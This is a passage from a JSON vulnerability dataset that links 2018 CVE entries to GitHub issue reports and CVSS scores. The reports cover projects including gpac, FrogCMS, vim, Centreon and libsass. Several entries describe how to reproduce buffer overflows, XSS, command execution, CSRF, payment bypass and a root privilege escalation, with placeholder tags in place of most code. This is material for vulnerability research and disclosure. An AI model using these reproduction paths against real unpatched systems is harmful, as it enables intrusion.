  30610. "description": "buffer overflow issue NUMBERTAG There is a buffer overflow issue in gf_sm_load_init () function, scene_manager.c APITAG APITAG load) { \u2026\u2026 ext = (char )strrchr(load APITAG '.'); if (!ext) return GF_NOT_SUPPORTED; if (!stricmp(ext, \".gz\")) { char anext; ext NUMBERTAG anext = (char )strrchr(load APITAG '.'); ext NUMBERTAG ext = anext; } APITAG &ext NUMBERTAG buffer overflow here. \u2026\u2026 } PATHTAG APITAG inctx APITAG out FILETAG add overview.srt overview.mp4 Timed Text (SRT) import text track NUMBERTAG font Serif (size NUMBERTAG stack smashing detected : APITAG terminated Aborted (core dumped) If you indentify this issue as a vulnerability, please provide me with following information NUMBERTAG the affected versions NUMBERTAG pitch NUMBERTAG please assign a CVE ID, discoverer is Guoxiang Niu, APITAG Team thank you",
  30611. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  30612. "severity": "HIGH",
  30613. "baseScore": 7.8,
  30614. "impactScore": 5.9,
  30615. "exploitabilityScore": 1.8
  30616. },
  30617. {
  30618. "CVE_ID": "CVE-2018-20762",
  30619. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1187",
  30620. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1187",
  30621. "Repo_new": "gpac/gpac",
  30622. "Issue_Created_At": "2018-12-22T02:47:42Z",
  30623. "description": "buffer overflow issue NUMBERTAG There is a buffer overflow issue in cat_multiple_files () function, fileimport.c APITAG APITAG dest, char APITAG u NUMBERTAG import_flags, Double force_fps, u NUMBERTAG frames_per_sample, char tmp_dir, Bool force_cat, Bool align_timelines, Bool allow_add_in_command) { \u2026\u2026 if (sep) { APITAG sep); // buffer overflow here. sep NUMBERTAG PATHTAG APITAG cat cat APITAG add overview.srt overview.mp4 Timed Text (SRT) import text track NUMBERTAG font Serif (size NUMBERTAG Segmentation fault (core dumped) If you indentify this issue as a vulnerability, please provide me with following information NUMBERTAG the affected versions NUMBERTAG pitch NUMBERTAG please assign a CVE ID, discoverer is Guoxiang Niu, APITAG Team thank you",
  30624. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  30625. "severity": "HIGH",
  30626. "baseScore": 7.8,
  30627. "impactScore": 5.9,
  30628. "exploitabilityScore": 1.8
  30629. },
  30630. {
  30631. "CVE_ID": "CVE-2018-20763",
  30632. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1188",
  30633. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1188",
  30634. "Repo_new": "gpac/gpac",
  30635. "Issue_Created_At": "2018-12-22T03:05:37Z",
  30636. "description": "buffer overflow issue NUMBERTAG There is a buffer overflow issue in gf_text_get_utf8_line () function, text_import.c in line NUMBERTAG of gf_text_import_srt, parameter APITAG is NUMBERTAG but in gf_text_get_utf8_line (), the size of APITAG is NUMBERTAG so, when the size of APITAG is more than NUMBERTAG the buffer of APITAG will overflow NUMBERTAG char sOK = APITAG NUMBERTAG srt_in, unicode_type); char gf_text_get_utf8_line(char APITAG u NUMBERTAG APITAG FILE txt_in, s NUMBERTAG unicode_type) { \u2026\u2026 char APITAG \u2026\u2026 len = (u NUMBERTAG APITAG // len might be more than NUMBERTAG for (i NUMBERTAG i APITAG NUMBERTAG j may more than NUMBERTAG here j++; APITAG NUMBERTAG bf; } \u2026\u2026 } PATHTAG APITAG srt NUMBERTAG crafted_text.srt Timed Text (SRT) import text track NUMBERTAG font Serif (size NUMBERTAG stack smashing detected : APITAG terminated Aborted (core dumped) PATHTAG gdb APITAG GNU gdb APITAG NUMBERTAG APITAG NUMBERTAG Copyright (C NUMBERTAG Free Software Foundation, Inc. License GPL NUMBERTAG GNU GPL version NUMBERTAG or later APITAG This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. Type \"show copying\" and \"show warranty\" for details. This GDB was configured as NUMBERTAG linux gnu\". Type \"show configuration\" for configuration details. For bug reporting instructions, please see: APITAG . Find the GDB manual and other documentation resources online at: APITAG . For help, type \"help\". Type \"apropos word\" to search for commands related to \"word\"... Reading symbols from APITAG (gdb) set args srt NUMBERTAG crafted_text.srt (gdb) b APITAG No source file named text_import.c. Make breakpoint pending on future shared library load? (y or [n]) y Breakpoint NUMBERTAG APITAG pending. (gdb) r Starting program: PATHTAG srt NUMBERTAG crafted_text.srt APITAG debugging using libthread_db enabled] Using host libthread_db library PATHTAG Timed Text (SRT) import text track NUMBERTAG font Serif (size NUMBERTAG Breakpoint NUMBERTAG gf_text_get_utf8_line APITAG NUMBERTAG n\", APITAG txt_in NUMBERTAG d NUMBERTAG unicode_type NUMBERTAG at APITAG NUMBERTAG APITAG NUMBERTAG gdb) c Continuing. Breakpoint NUMBERTAG gf_text_get_utf8_line APITAG NUMBERTAG n\", APITAG txt_in NUMBERTAG d NUMBERTAG unicode_type NUMBERTAG at APITAG NUMBERTAG APITAG NUMBERTAG gdb) c Continuing. Breakpoint NUMBERTAG gf_text_get_utf8_line ( APITAG \"hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello world hello wo\"..., APITAG txt_in NUMBERTAG d NUMBERTAG unicode_type NUMBERTAG at APITAG NUMBERTAG APITAG NUMBERTAG gdb) p j NUMBERTAG gdb) c Continuing. stack smashing detected : PATHTAG terminated Program received signal SIGABRT, Aborted NUMBERTAG ffff NUMBERTAG b7c NUMBERTAG in __GI_raise (sig=sig APITAG at PATHTAG NUMBERTAG PATHTAG No such file or directory. (gdb) If you indentify this issue as a vulnerability, please provide me with following information NUMBERTAG the affected versions NUMBERTAG pitch NUMBERTAG please assign a CVE ID, discoverer is Guoxiang Niu, APITAG Team thank you",
  30637. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  30638. "severity": "HIGH",
  30639. "baseScore": 7.8,
  30640. "impactScore": 5.9,
  30641. "exploitabilityScore": 1.8
  30642. },
  30643. {
  30644. "CVE_ID": "CVE-2018-20772",
  30645. "Issue_Url_old": "https://github.com/philippe/FrogCMS/issues/24",
  30646. "Issue_Url_new": "https://github.com/philippe/frogcms/issues/24",
  30647. "Repo_new": "philippe/frogcms",
  30648. "Issue_Created_At": "2018-12-31T08:40:52Z",
  30649. "description": "The APITAG NUMBERTAG has command execution in URLTAG The APITAG NUMBERTAG has command execution in URLTAG NUMBERTAG login NUMBERTAG open URLTAG NUMBERTAG input exp APITAG in body FILETAG NUMBERTAG open URLTAG NUMBERTAG layout choose none FILETAG NUMBERTAG open FILETAG FILETAG",
  30650. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  30651. "severity": "HIGH",
  30652. "baseScore": 7.2,
  30653. "impactScore": 5.9,
  30654. "exploitabilityScore": 1.2
  30655. },
  30656. {
  30657. "CVE_ID": "CVE-2018-20773",
  30658. "Issue_Url_old": "https://github.com/philippe/FrogCMS/issues/23",
  30659. "Issue_Url_new": "https://github.com/philippe/frogcms/issues/23",
  30660. "Repo_new": "philippe/frogcms",
  30661. "Issue_Created_At": "2018-12-31T08:19:04Z",
  30662. "description": "The APITAG NUMBERTAG has Command execution in URLTAG The APITAG NUMBERTAG has Command execution in URLTAG NUMBERTAG login NUMBERTAG open URLTAG NUMBERTAG input exp APITAG in body FILETAG NUMBERTAG save and close NUMBERTAG open PATHTAG FILETAG",
  30663. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  30664. "severity": "HIGH",
  30665. "baseScore": 7.2,
  30666. "impactScore": 5.9,
  30667. "exploitabilityScore": 1.2
  30668. },
  30669. {
  30670. "CVE_ID": "CVE-2018-20774",
  30671. "Issue_Url_old": "https://github.com/philippe/FrogCMS/issues/26",
  30672. "Issue_Url_new": "https://github.com/philippe/frogcms/issues/26",
  30673. "Repo_new": "philippe/frogcms",
  30674. "Issue_Created_At": "2018-12-31T13:14:02Z",
  30675. "description": "The APITAG NUMBERTAG has xss in URLTAG The APITAG NUMBERTAG has xss in URLTAG body NUMBERTAG login NUMBERTAG open URLTAG NUMBERTAG input exp ERRORTAG FILETAG NUMBERTAG save NUMBERTAG open FILETAG FILETAG",
  30676. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  30677. "severity": "MEDIUM",
  30678. "baseScore": 5.4,
  30679. "impactScore": 2.7,
  30680. "exploitabilityScore": 2.3
  30681. },
  30682. {
  30683. "CVE_ID": "CVE-2018-20775",
  30684. "Issue_Url_old": "https://github.com/philippe/FrogCMS/issues/27",
  30685. "Issue_Url_new": "https://github.com/philippe/frogcms/issues/27",
  30686. "Repo_new": "philippe/frogcms",
  30687. "Issue_Created_At": "2018-12-31T14:10:40Z",
  30688. "description": "The APITAG NUMBERTAG has command execution in URLTAG The APITAG NUMBERTAG has command execution in URLTAG NUMBERTAG login NUMBERTAG open URLTAG NUMBERTAG click Create new file FILETAG NUMBERTAG input FILETAG FILETAG NUMBERTAG open FILETAG input APITAG FILETAG NUMBERTAG save NUMBERTAG open FILETAG FILETAG",
  30689. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  30690. "severity": "HIGH",
  30691. "baseScore": 7.2,
  30692. "impactScore": 5.9,
  30693. "exploitabilityScore": 1.2
  30694. },
  30695. {
  30696. "CVE_ID": "CVE-2018-20776",
  30697. "Issue_Url_old": "https://github.com/philippe/FrogCMS/issues/21",
  30698. "Issue_Url_new": "https://github.com/philippe/frogcms/issues/21",
  30699. "Repo_new": "philippe/frogcms",
  30700. "Issue_Created_At": "2018-12-29T06:30:18Z",
  30701. "description": "Frog CMS NUMBERTAG has Information Disclosure Vulnerability in frogcms/public. Direct access APITAG FILETAG",
  30702. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  30703. "severity": "HIGH",
  30704. "baseScore": 7.5,
  30705. "impactScore": 3.6,
  30706. "exploitabilityScore": 3.9
  30707. },
  30708. {
  30709. "CVE_ID": "CVE-2018-20777",
  30710. "Issue_Url_old": "https://github.com/philippe/FrogCMS/issues/25",
  30711. "Issue_Url_new": "https://github.com/philippe/frogcms/issues/25",
  30712. "Repo_new": "philippe/frogcms",
  30713. "Issue_Created_At": "2018-12-31T13:07:32Z",
  30714. "description": "The APITAG NUMBERTAG has xss in URLTAG The APITAG NUMBERTAG has xss in URLTAG body NUMBERTAG login NUMBERTAG open URLTAG body NUMBERTAG input exp APITAG FILETAG NUMBERTAG save NUMBERTAG open FILETAG FILETAG",
  30715. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  30716. "severity": "MEDIUM",
  30717. "baseScore": 5.4,
  30718. "impactScore": 2.7,
  30719. "exploitabilityScore": 2.3
  30720. },
  30721. {
  30722. "CVE_ID": "CVE-2018-20778",
  30723. "Issue_Url_old": "https://github.com/philippe/FrogCMS/issues/28",
  30724. "Issue_Url_new": "https://github.com/philippe/frogcms/issues/28",
  30725. "Repo_new": "philippe/frogcms",
  30726. "Issue_Created_At": "2018-12-31T14:30:17Z",
  30727. "description": "The APITAG NUMBERTAG has xss in URLTAG The APITAG NUMBERTAG has xss in URLTAG NUMBERTAG login NUMBERTAG open URLTAG NUMBERTAG create new file NUMBERTAG open and input exp ERRORTAG FILETAG NUMBERTAG save NUMBERTAG open URLTAG FILETAG",
  30728. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  30729. "severity": "MEDIUM",
  30730. "baseScore": 6.1,
  30731. "impactScore": 2.7,
  30732. "exploitabilityScore": 2.8
  30733. },
  30734. {
  30735. "CVE_ID": "CVE-2018-20782",
  30736. "Issue_Url_old": "https://github.com/GloBee-Official/woocommerce-payment-api-plugin/issues/3",
  30737. "Issue_Url_new": "https://github.com/globee-official/woocommerce-payment-api-plugin/issues/3",
  30738. "Repo_new": "globee-official/woocommerce-payment-api-plugin",
  30739. "Issue_Created_At": "2019-02-19T10:43:57Z",
  30740. "description": "Public disclosure on CVETAG Payment Bypass / Unauthorized Order Status Spoofing]. CVETAG Reliance on untrusted inputs ([ CVETAG CVETAG , insufficient data verification and lack of any cryptographic authentication (hmac etc) at IPN callback allow remote ( even _unauthorized_ ) attacker to bypass payment process and spoof real order status without actually paying for it. Vulnerable code (fixed in PR NUMBERTAG URLTAG Affected versions NUMBERTAG Tested on: APITAG NUMBERTAG APITAG NUMBERTAG FILETAG APITAG of Concept APITAG APITAG APITAG (php): APITAG PATHTAG APITAG APITAG (shell): CODETAG APITAG APITAG",
  30741. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  30742. "severity": "HIGH",
  30743. "baseScore": 7.5,
  30744. "impactScore": 3.6,
  30745. "exploitabilityScore": 3.9
  30746. },
  30747. {
  30748. "CVE_ID": "CVE-2018-20786",
  30749. "Issue_Url_old": "https://github.com/vim/vim/issues/3711",
  30750. "Issue_Url_new": "https://github.com/vim/vim/issues/3711",
  30751. "Repo_new": "vim/vim",
  30752. "Issue_Created_At": "2018-12-24T07:53:42Z",
  30753. "description": "Possible NPD error . Hi, recently I use fuzzing to check the vim and I find an NPD problem. In PATHTAG APITAG This could return a null pointer for the caller function vterm_obtain_screen and store in the vt >screen. APITAG This null screen is return to create_vterm function in src/terminal.c APITAG then again in vterm_screen_set_callbacks function defined in PATHTAG APITAG The callback function is set to a null pointer screen. The potential problem is that you can set a callback function to a predefined NULL memory address which might lead to more problem. I wonder this is a true problem in vim or not, could you help to verify it? I am looking forward to your reply!",
  30754. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  30755. "severity": "HIGH",
  30756. "baseScore": 7.5,
  30757. "impactScore": 3.6,
  30758. "exploitabilityScore": 3.9
  30759. },
  30760. {
  30761. "CVE_ID": "CVE-2018-20787",
  30762. "Issue_Url_old": "https://github.com/MiCode/Xiaomi_Kernel_OpenSource/issues/991",
  30763. "Issue_Url_new": "https://github.com/micode/xiaomi_kernel_opensource/issues/991",
  30764. "Repo_new": "micode/xiaomi_kernel_opensource",
  30765. "Issue_Created_At": "2018-12-19T14:14:05Z",
  30766. "description": "Integer overflow in perseus p oss. There is a suspected integer overflow vulnerability in the tpdbg_write method in PATHTAG When the NUMBERTAG rd argument CODETAG size' or ZERO_SIZE_PTR is possibly required to fix this issue.",
  30767. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  30768. "severity": "MEDIUM",
  30769. "baseScore": 5.5,
  30770. "impactScore": 3.6,
  30771. "exploitabilityScore": 1.8
  30772. },
  30773. {
  30774. "CVE_ID": "CVE-2018-20788",
  30775. "Issue_Url_old": "https://github.com/MiCode/Xiaomi_Kernel_OpenSource/issues/973",
  30776. "Issue_Url_new": "https://github.com/micode/xiaomi_kernel_opensource/issues/973",
  30777. "Repo_new": "micode/xiaomi_kernel_opensource",
  30778. "Issue_Created_At": "2018-11-18T13:57:18Z",
  30779. "description": "Integer overflows in the led driver of the daisy o oss branch. There are several suspected integer overflow bugs in PATHTAG line NUMBERTAG The led id may be equal to or greater than the integer length (depends on the target arch), which causes integer overflow when using the left shift operation NUMBERTAG led >id\". Possible solution for this case would be to cast the integer NUMBERTAG to a data type of larger length before shifting it with led >id.",
  30780. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  30781. "severity": "MEDIUM",
  30782. "baseScore": 5.5,
  30783. "impactScore": 3.6,
  30784. "exploitabilityScore": 1.8
  30785. },
  30786. {
  30787. "CVE_ID": "CVE-2018-20806",
  30788. "Issue_Url_old": "https://github.com/lota/phamm/issues/24",
  30789. "Issue_Url_new": "https://github.com/lota/phamm/issues/24",
  30790. "Repo_new": "lota/phamm",
  30791. "Issue_Created_At": "2018-03-20T12:36:33Z",
  30792. "description": "Reflected XSS in Phamm login page. Reflected Cross Site Scripting Issue : Cross Site Scripting (XSS) attack is a type of injection attack, in which malicious code is injected into trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side code, to a different end user. The end user\u2019s browser has no way to know that the code should not be trusted, and will execute the code. Because the end user thinks the script came from a trusted source, the malicious code can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. This code can even rewrite the content of the HTML page. Proof Of Concept : URL : URLTAG FILETAG Reason for this issue is $action is not sanitised and is reflected inside the title.",
  30793. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  30794. "severity": "MEDIUM",
  30795. "baseScore": 6.1,
  30796. "impactScore": 2.7,
  30797. "exploitabilityScore": 2.8
  30798. },
  30799. {
  30800. "CVE_ID": "CVE-2018-20819",
  30801. "Issue_Url_old": "https://github.com/dropbox/lepton/issues/112",
  30802. "Issue_Url_new": "https://github.com/dropbox/lepton/issues/112",
  30803. "Repo_new": "dropbox/lepton",
  30804. "Issue_Created_At": "2018-07-17T02:42:05Z",
  30805. "description": "APITAG heap buffer overflow at APITAG POCs: URLTAG URLTAG ASAN output ( ERRORTAG ): ERRORTAG When running without ERRORTAG , it crashes with invalid system call message.",
  30806. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  30807. "severity": "HIGH",
  30808. "baseScore": 7.8,
  30809. "impactScore": 5.9,
  30810. "exploitabilityScore": 1.8
  30811. },
  30812. {
  30813. "CVE_ID": "CVE-2018-20820",
  30814. "Issue_Url_old": "https://github.com/dropbox/lepton/issues/111",
  30815. "Issue_Url_new": "https://github.com/dropbox/lepton/issues/111",
  30816. "Repo_new": "dropbox/lepton",
  30817. "Issue_Created_At": "2018-07-17T02:38:50Z",
  30818. "description": "Integer Overflow at PATHTAG We found with our fuzzer an interger overflow error inside APITAG from jpgcoder.cc when feeding lepton NUMBERTAG f6d NUMBERTAG c with a crafted lep file. POC: URLTAG When running ERRORTAG , it output the messages: ERRORTAG When running APITAG , it crashes with message like: CODETAG",
  30819. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  30820. "severity": "MEDIUM",
  30821. "baseScore": 5.5,
  30822. "impactScore": 3.6,
  30823. "exploitabilityScore": 1.8
  30824. },
  30825. {
  30826. "CVE_ID": "CVE-2018-20821",
  30827. "Issue_Url_old": "https://github.com/sass/libsass/issues/2658",
  30828. "Issue_Url_new": "https://github.com/sass/libsass/issues/2658",
  30829. "Repo_new": "sass/libsass",
  30830. "Issue_Created_At": "2018-06-02T07:13:45Z",
  30831. "description": "Stack over flow errors when creating APITAG We found with our fuzzer some stack over flow errors when constructing APITAG at Line NUMBERTAG in parser.cpp APITAG when compiled with Address Sanitizer (using sassc as the driver). ERRORTAG sample inputs: FILETAG FILETAG FILETAG FILETAG",
  30832. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  30833. "severity": "MEDIUM",
  30834. "baseScore": 6.5,
  30835. "impactScore": 3.6,
  30836. "exploitabilityScore": 2.8
  30837. },
  30838. {
  30839. "CVE_ID": "CVE-2018-20822",
  30840. "Issue_Url_old": "https://github.com/sass/libsass/issues/2671",
  30841. "Issue_Url_new": "https://github.com/sass/libsass/issues/2671",
  30842. "Repo_new": "sass/libsass",
  30843. "Issue_Created_At": "2018-06-03T04:54:21Z",
  30844. "description": "APITAG stack overflow at APITAG APITAG We found with our fuzzer some stack over flow errors at APITAG APITAG when compiled with Address Sanitizer (using sassc as the driver). ERRORTAG Sample input files: FILETAG FILETAG",
  30845. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  30846. "severity": "MEDIUM",
  30847. "baseScore": 6.5,
  30848. "impactScore": 3.6,
  30849. "exploitabilityScore": 2.8
  30850. },
  30851. {
  30852. "CVE_ID": "CVE-2018-20840",
  30853. "Issue_Url_old": "https://github.com/google/google-api-cpp-client/issues/57",
  30854. "Issue_Url_new": "https://github.com/google/google-api-cpp-client/issues/57",
  30855. "Repo_new": "google/google-api-cpp-client",
  30856. "Issue_Created_At": "2018-08-10T00:58:24Z",
  30857. "description": "Error on 'exp' type handling in ID Token . Problem: The following errors occurred during the attempt to request ID Token with specifying \u2018profile\u2019 or \u2018email\u2019 in SCOPES parameter. ERRORTAG Cause: When receiving ID Token from Google APITAG Server, \u2018exp\u2019 in the token is representing the type of integer. Unfortunately, 'google api cpp client' deals with it as a string type; it causes the above problem. For your information, I attached the format of ID Token received from the server. CODETAG",
  30858. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H",
  30859. "severity": "HIGH",
  30860. "baseScore": 8.6,
  30861. "impactScore": 4.0,
  30862. "exploitabilityScore": 3.9
  30863. },
  30864. {
  30865. "CVE_ID": "CVE-2018-20843",
  30866. "Issue_Url_old": "https://github.com/libexpat/libexpat/issues/186",
  30867. "Issue_Url_new": "https://github.com/libexpat/libexpat/issues/186",
  30868. "Repo_new": "libexpat/libexpat",
  30869. "Issue_Created_At": "2018-01-25T15:38:40Z",
  30870. "description": "NUMBERTAG k xml file uses NUMBERTAG G memory. valgrind tool=massif xmlwf FILETAG reports that xmlwf uses NUMBERTAG G of memory to load this bogus xml document. FILETAG This was reported by oss fuzz against APITAG ( CVETAG which uses expat and has the same memory use so I felt I should pass it on.",
  30871. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  30872. "severity": "HIGH",
  30873. "baseScore": 7.5,
  30874. "impactScore": 3.6,
  30875. "exploitabilityScore": 3.9
  30876. },
  30877. {
  30878. "CVE_ID": "CVE-2018-20962",
  30879. "Issue_Url_old": "https://github.com/Laravel-Backpack/CRUD/issues/1297",
  30880. "Issue_Url_new": "https://github.com/laravel-backpack/crud/issues/1297",
  30881. "Repo_new": "laravel-backpack/crud",
  30882. "Issue_Created_At": "2018-03-22T21:05:42Z",
  30883. "description": "Cross site scripting vulnerability. Bug report Relational columns (select) renders html which allows scripts to be executed! FILETAG What I did: CODETAG What I expected to happen: The column should escape all html, and render it as text. What happened: If the team name contains html and javascript, e.g: APITAG Then the alert will pop up if that column is rendered on the page. What I've already tried to fix it: APITAG CODETAG Backpack, Laravel, PHP, DB version: APITAG APITAG ERRORTAG",
  30884. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  30885. "severity": "MEDIUM",
  30886. "baseScore": 6.1,
  30887. "impactScore": 2.7,
  30888. "exploitabilityScore": 2.8
  30889. },
  30890. {
  30891. "CVE_ID": "CVE-2018-20999",
  30892. "Issue_Url_old": "https://github.com/brycx/orion/issues/46",
  30893. "Issue_Url_new": "https://github.com/orion-rs/orion/issues/46",
  30894. "Repo_new": "orion-rs/orion",
  30895. "Issue_Created_At": "2018-12-20T17:00:06Z",
  30896. "description": "APITAG not working correctly. Currently APITAG checks whether or not the state is already finalized. If it is not finalized, it will not reset the state. So if someone were to call APITAG after not having finalized the state before, incorrect results would be produced. Such streaming states include hmac , APITAG , APITAG and cshake .",
  30897. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  30898. "severity": "HIGH",
  30899. "baseScore": 7.5,
  30900. "impactScore": 3.6,
  30901. "exploitabilityScore": 3.9
  30902. },
  30903. {
  30904. "CVE_ID": "CVE-2018-21015",
  30905. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1179",
  30906. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1179",
  30907. "Repo_new": "gpac/gpac",
  30908. "Issue_Created_At": "2018-12-15T06:54:00Z",
  30909. "description": "SEGV in APITAG at APITAG Tested in Ubuntu NUMBERTAG bit, gcc NUMBERTAG gpac (master NUMBERTAG ad NUMBERTAG Compile cmd APITAG APITAG Triggered by APITAG POC file: URLTAG gdb info: CODETAG",
  30910. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  30911. "severity": "MEDIUM",
  30912. "baseScore": 6.5,
  30913. "impactScore": 3.6,
  30914. "exploitabilityScore": 2.8
  30915. },
  30916. {
  30917. "CVE_ID": "CVE-2018-21016",
  30918. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1180",
  30919. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1180",
  30920. "Repo_new": "gpac/gpac",
  30921. "Issue_Created_At": "2018-12-15T07:16:20Z",
  30922. "description": "APITAG heap buffer overflow in APITAG at APITAG Tested in Ubuntu NUMBERTAG bit, gcc NUMBERTAG gpac (master NUMBERTAG ad NUMBERTAG Compile cmd: ERRORTAG make Triggered by APITAG POC file: URLTAG ASAN info: ERRORTAG GDB info: CODETAG",
  30923. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  30924. "severity": "MEDIUM",
  30925. "baseScore": 6.5,
  30926. "impactScore": 3.6,
  30927. "exploitabilityScore": 2.8
  30928. },
  30929. {
  30930. "CVE_ID": "CVE-2018-21017",
  30931. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1183",
  30932. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1183",
  30933. "Repo_new": "gpac/gpac",
  30934. "Issue_Created_At": "2018-12-17T15:51:57Z",
  30935. "description": "APITAG memory leaks of APITAG Tested in Ubuntu NUMBERTAG bit, gcc NUMBERTAG gpac (master d1c4bc3) Compile cmd: ERRORTAG APITAG Triggered by APITAG POC file: URLTAG ASAN info: ERRORTAG",
  30936. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  30937. "severity": "MEDIUM",
  30938. "baseScore": 6.5,
  30939. "impactScore": 3.6,
  30940. "exploitabilityScore": 2.8
  30941. },
  30942. {
  30943. "CVE_ID": "CVE-2018-21025",
  30944. "Issue_Url_old": "https://github.com/centreon/centreon/issues/7082",
  30945. "Issue_Url_new": "https://github.com/centreon/centreon/issues/7082",
  30946. "Repo_new": "centreon/centreon",
  30947. "Issue_Created_At": "2018-12-21T15:05:56Z",
  30948. "description": "[security] Privilege Escalation from crontab. BUG REPORT INFORMATION OS : Centreon Central NUMBERTAG el7 Vulnerability The crontab deployed when installing the package or when using the VM executes a perl script as root every day to backup the database: APITAG In this perl script, there are two command executions that use a path defined by a configuration file: CODETAG But the permissions to this configuration are too open, as the group may write to it: APITAG This leads to a privesc to root from any user from the centreon group, of which apache is conveniently a member of: APITAG For instance, apache could change the path in the configuration file to execute a script to get sudo rights when the DB is saved: CODETAG It's realistic that apache would be the account to privesc from because of RCEs in Centreon's codebase.",
  30949. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  30950. "severity": "CRITICAL",
  30951. "baseScore": 9.8,
  30952. "impactScore": 5.9,
  30953. "exploitabilityScore": 3.9
  30954. },
  30955. {
  30956. "CVE_ID": "CVE-2018-21029",
  30957. "Issue_Url_old": "https://github.com/systemd/systemd/issues/9397",
  30958. "Issue_Url_new": "https://github.com/systemd/systemd/issues/9397",
  30959. "Repo_new": "systemd/systemd",
  30960. "Issue_Created_At": "2018-06-24T22:42:26Z",
  30961. "description": "RFE: Certificate checking for Resolveds DNS over TLS feature. Since systemd NUMBERTAG APITAG supports DNS over TLS. Currently (systemd version NUMBERTAG APITAG does not certificate checking for DNS Servers as covered in this PR: URLTAG This issue is for keeping track of certificate checking for DNS over TLS.",
  30962. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  30963. "severity": "CRITICAL",
  30964. "baseScore": 9.8,
  30965. "impactScore": 5.9,
  30966. "exploitabilityScore": 3.9
  30967. },
  30968. {
  30969. "CVE_ID": "CVE-2018-21034",
  30970. "Issue_Url_old": "https://github.com/argoproj/argo-cd/issues/470",
  30971. "Issue_Url_new": "https://github.com/argoproj/argo-cd/issues/470",
  30972. "Repo_new": "argoproj/argo-cd",
  30973. "Issue_Created_At": "2018-07-26T23:15:26Z",
  30974. "description": "K8s secrets need to be redacted in API server. We currently treat secrets the same as any other k8s object, displaying the YAML/JSON contents in the UI. But secret values need to be redacted or a separate RBAC rule to view them.",
  30975. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  30976. "severity": "MEDIUM",
  30977. "baseScore": 6.5,
  30978. "impactScore": 3.6,
  30979. "exploitabilityScore": 2.8
  30980. },
  30981. {
  30982. "CVE_ID": "CVE-2018-21037",
  30983. "Issue_Url_old": "https://github.com/intelliants/subrion/issues/638",
  30984. "Issue_Url_new": "https://github.com/intelliants/subrion/issues/638",
  30985. "Repo_new": "intelliants/subrion",
  30986. "Issue_Created_At": "2018-02-13T07:26:55Z",
  30987. "description": "CSRF Attack On Change Password!. Hi Team, The application is vulnerable to CSRF attack. Affected Application Version: Subrion CMS NUMBERTAG The attacker can change the administrator password by sending a crafted request to the application on change password field. The application is not validating the source origin of the request is coming from also CSRF token is not implemented. Proof of concept as given below NUMBERTAG Crafted Code of Change Password of Administrator User. FILETAG NUMBERTAG Crafted Request to Change the Password of Administrator. FILETAG NUMBERTAG The Password is Changed Successfully. FILETAG Recommendation NUMBERTAG Implement CSRF Token NUMBERTAG alidate the Source Origin When you fix the bug, please, can you include my name in the release notes when the bug will be corrected? Name : Tushar Kadam Email : EMAILTAG Thank you.",
  30988. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  30989. "severity": "HIGH",
